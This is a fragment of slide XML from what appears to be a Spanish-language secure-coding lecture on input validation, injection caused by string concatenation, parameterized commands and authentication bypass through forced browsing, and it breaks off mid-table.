            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="69000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>¿Qué hacemos con los irlandeses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A32FDC-9C67-3946-ACD5-190BAEC3669B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3792298"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
              <a:alpha val="69000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nombres, comentarios, artículos y textos libres en general requieren comillas: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>O’Brien, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> , “entre comillas”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Si bien la validación de entrada de datos reduce la superficie de exposición, no puede prevenir todos los ataques </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363813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216038"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="5400" dirty="0"/>
              <a:t>En resumen…</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type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1801412"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>validación de entradas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reduce la superficie de ataque y previene varios tipos de ataques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>listas de bloqueos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>es una mala práctica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Muchas entradas de datos son simplemente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>alfanuméricas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Para aquellos tipos de datos que necesitan caracteres especiales, necesitamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="3200" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>otros tipos de defensa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189045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FA69-2AB4-7744-800C-714D891EC1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338202" y="363255"/>
            <a:ext cx="10345840" cy="1327759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Las c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="8800" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>oncatenaciones</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="6600" b="1"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F6C0B370-2B64-0242-B19C-0A54237459CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511265" y="4887357"/>
            <a:ext cx="10846546"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UY" sz="8000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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rPr>
              <a:t>… causan inyecciones!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" sz="8000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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5E507BF-8C02-1046-8EF2-1FB5D2FFAFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620110" y="2627917"/>
            <a:ext cx="11187678"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UY" sz="5400" b="1"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rPr>
              <a:t>COMMAND + </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" sz="5400" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="800080"/>
                </a:highlight>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" sz="5400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-UY" sz="5400" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INJECTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51AC20D-3679-3443-B9E1-C79D69AB588E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21125974">
            <a:off x="2832528" y="3420794"/>
            <a:ext cx="4724370" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow>
              <a:schemeClr val="accent4">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glo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UY" sz="5400" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Otro Comando</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245955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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2210567" y="320356"/>
            <a:ext cx="9344124" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Evasión de Autenticación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BB19F13-0915-7446-9028-EC431BE4CA7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398878" y="1408656"/>
            <a:ext cx="3606748" cy="3503281"/>
            <a:chOff x="1398878" y="1408656"/>
            <a:chExt cx="3606748" cy="3503281"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D721913-DCA6-2749-BF68-9D3623614B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61896" r="2089" b="6904"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3391047" y="1408656"/>
              <a:ext cx="718457" cy="926275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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1507314" y="1431834"/>
              <a:ext cx="718457" cy="872837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1507314" y="2237585"/>
              <a:ext cx="732893" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>/login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD39C724-D387-0645-AD03-15F0B8D33AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3249244" y="2226979"/>
              <a:ext cx="1173655" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>/restricted</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3768" y="3613109"/>
              <a:ext cx="952500" cy="952500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="Group 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0143C41B-0369-DF42-8D23-CD96297C5EB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398878" y="3469666"/>
              <a:ext cx="1707519" cy="1442271"/>
              <a:chOff x="1345136" y="3444526"/>
              <a:chExt cx="1707519" cy="1442271"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="18" name="Graphic 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E9B8A2A-1A9D-7742-A5FF-32C355FA5C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93270576-9AC6-5147-9955-7029A4B44A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6BC41E3C-7C7A-034A-8B7E-41549B3D4C3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1345136" y="4579020"/>
                <a:ext cx="1707519" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="es-UY" dirty="0"/>
                  <a:t>Usuarios Comunes</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3384278" y="4551251"/>
              <a:ext cx="960391" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Atacante</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Curved Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="0"/>
              <a:endCxn id="8" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="1443071" y="3037608"/>
              <a:ext cx="862749" cy="1367"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">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6B146178-72F2-974B-BB4F-8808455E4F27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="8" idx="2"/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2264842" y="1480713"/>
              <a:ext cx="735123" cy="1517286"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector4">
              <a:avLst>
                <a:gd name="adj1" fmla="val -31097"/>
                <a:gd name="adj2" fmla="val 62076"/>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6AD4CEB-26B0-0746-B537-EFE45C343400}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="17" idx="0"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="3329646" y="3102737"/>
              <a:ext cx="1016798" cy="3946"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector3">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ED7DDE3-48F9-A349-B146-4C9BC97FFCC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3836072" y="3032514"/>
              <a:ext cx="1169554" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="es-UY" dirty="0"/>
                <a:t>Navegación Forzada</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F34450E0-B6BF-A34A-87C8-8AEFD254BD08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277211" y="1868252"/>
            <a:ext cx="4784677" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0"/>
              <a:t>La evasión de autenticación sucede cuando la aplicación no evita que un usuario desconocido acceda a una funcionalidad restringida del Sistema.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0C402D1-5205-3906-64FB-227364F38EFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="15594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Y" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Ataque-Gramas</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="16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16052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1AC20D-3679-3443-B9E1-C79D69AB588E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21370022">
            <a:off x="-213727" y="1320343"/>
            <a:ext cx="10104048"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UY" sz="6000" b="1" i="0" u="sng"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rPr>
              <a:t>Comandos Parametrizados</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB36DCC-8D27-D944-BDCB-328E12A45B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514231" y="367575"/>
            <a:ext cx="7659148"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UY" sz="8000" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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rPr>
              <a:t>CONCATENACIÓN</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-UY" sz="6600" b="1" i="0" u="none" strike="sngStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="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95E1B735-5B12-EB41-9223-69A188D927C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1780537425"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838726" y="2666436"/>
          <a:ext cx="5775588" cy="2474208"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:effectLst/>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3149890">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1410839684"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2625698">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1305350556"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-UY" sz="3600" b="1" noProof="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Comando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UY" sz="3600" b="1" u="sng" noProof="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Constante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3156418"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="824736">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-UY" sz="3600" b="1" noProof="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Parámetro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UY" sz="3600" b="1" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0070C0"/>
                          </a:solidFill>
